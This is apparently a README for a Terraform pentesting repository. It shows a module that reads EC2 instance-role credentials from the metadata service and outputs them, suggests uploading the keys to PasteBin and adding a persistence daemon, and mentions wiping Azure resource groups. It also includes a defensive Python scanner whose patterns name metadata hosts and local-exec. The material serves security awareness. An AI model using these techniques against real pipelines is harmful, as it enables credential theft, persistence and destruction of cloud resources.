terraform-deployment-pentesting
This is a collection of tiny Terraform modules that can be used to do dangerous things in a CI/CD pipeline.
Terraform over CI/CD is basically RCE-as-a-service by design, so it's important to be aware of different security risks that can occur when designing an acceptable Terraform deployment setup.
This repository is not meant to provide an exhaustive list of defensive measures. It is only meant to provide a good laugh and increased awareness of what exactly you can do if you're a developer who can commit to repositories that kick off Terraform builds.
Grabbing EC2 Credentials
If you run this on an EC2 instance with a privileged role attached, it will return credentials.
module "get_creds" {
  source               = "github.com/kmcquade/terraform-deployment-pentesting.git//grab-creds-from-ec2-metadata?ref=master"
  is_local_environment = false
}
Response:
$ terraform apply -auto-approve
data.http.role_name: Refreshing state... [id=http://localhost:1338/latest/meta-data/iam/security-credentials/]
data.http.credentials: Refreshing state... [id=http://localhost:1338/latest/meta-data/iam/security-credentials/baskinc-role]
Apply complete! Resources: 0 added, 0 changed, 0 destroyed.
Outputs:
credentials = {
"Code": "Success",
"LastUpdated": "2020-04-02T18:50:40Z",
"Type": "AWS-HMAC",
"AccessKeyId": "12345678901",
"SecretAccessKey": "v/12345678901",
"Token": "TEST92test48TEST+y6RpoTEST92test48TEST/8oWVAiBqTEsT5Ky7ty2tEStxC1T==",
"Expiration": "2020-04-02T00:49:51Z"
}
You can then access the attributes of the module, such as module.get_creds.access_key, module.get_creds.secret_access_key, and module.get_creds.session_token, and upload those credentials to wherever you want. For example, you could upload those access keys to the PasteBin provider.
Of course, you could also do a bunch of crazy stuff like creating a daemon service on the machine using the local_file resource and bash commands, and then refresh those credentials every 15 minutes.
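A pre-apply gate that a pipeline owner can run over the Terraform configuration before `terraform apply`, catching the constructs this section relies on (an http data source pointed at the instance metadata endpoint, local_file, local-exec). This is an added example written for this README, not a module from the repository; the sample HCL, the rule names, and the mock-IMDS host list are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample configuration: the patterns this README describes plus one benign resource.
SAMPLE_HCL = """
data "http" "role_name" {
  url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
}

resource "local_file" "unit" {
  filename = "/etc/systemd/system/refresh.service"
  content  = "..."
}

resource "null_resource" "run" {
  provisioner "local-exec" {
    command = "bash ./setup.sh"
  }
}

resource "aws_s3_bucket" "logs" {
  bucket = "example-logs"
}
"""

# Hosts that reach the instance metadata service; localhost:1338 is the metadata-mock
# port seen in this README's sample output. Assumed list, extend for your environment.
IMDS_HOSTS = ("169.254.169.254", "[fd00:ec2::254]", "localhost:1338", "127.0.0.1:1338")

# Block headers that mean "this plan can execute code or touch the runner's filesystem".
RISKY_BLOCKS = {
    ("provisioner", "local-exec"): "runs arbitrary shell on the CI runner",
    ("resource", "local_file"): "writes files on the CI runner",
    ("data", "external"): "executes a program on the CI runner",
}
BLOCK_RE = re.compile(r'^\s*(data|resource|provisioner)\s+"([^"]+)"')
URL_RE = re.compile(r'\burl\s*=\s*"([^"]*)"')


@dataclass(frozen=True)
class Finding:
    line: int
    rule: str
    detail: str


def scan_hcl(text: str) -> List[Finding]:
    """Line-based scan; returns one Finding per risky construct, in file order."""
    findings: List[Finding] = []
    current: Optional[Tuple[str, str]] = None  # most recent block header, e.g. ("data", "http")
    for lineno, line in enumerate(text.splitlines(), start=1):
        header = BLOCK_RE.match(line)
        if header:
            current = (header.group(1), header.group(2))
            if current in RISKY_BLOCKS:
                findings.append(Finding(lineno, current[1], RISKY_BLOCKS[current]))
            continue
        url = URL_RE.search(line)
        if url and current == ("data", "http") and any(h in url.group(1) for h in IMDS_HOSTS):
            findings.append(Finding(lineno, "imds-read", f"http data source reads {url.group(1)}"))
    return findings


def plan_may_proceed(text: str) -> bool:
    """Gate verdict: True only when no risky construct was found."""
    return not scan_hcl(text)
```

A regex scan is a coarse control; the durable fix is to give the pipeline's role only the permissions the deployment needs and to review every Terraform change before it reaches a runner that holds them.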
Nuking every Azure Resource Group in every Azure subscription
Note: An assumption in this case is that you are using the same service principal per Terraform pipeline build.
This content is covered in my blog here: https://kmcquade.com/2020/11/nuking-all-azure-resource-groups-under-all-azure-subscriptions/.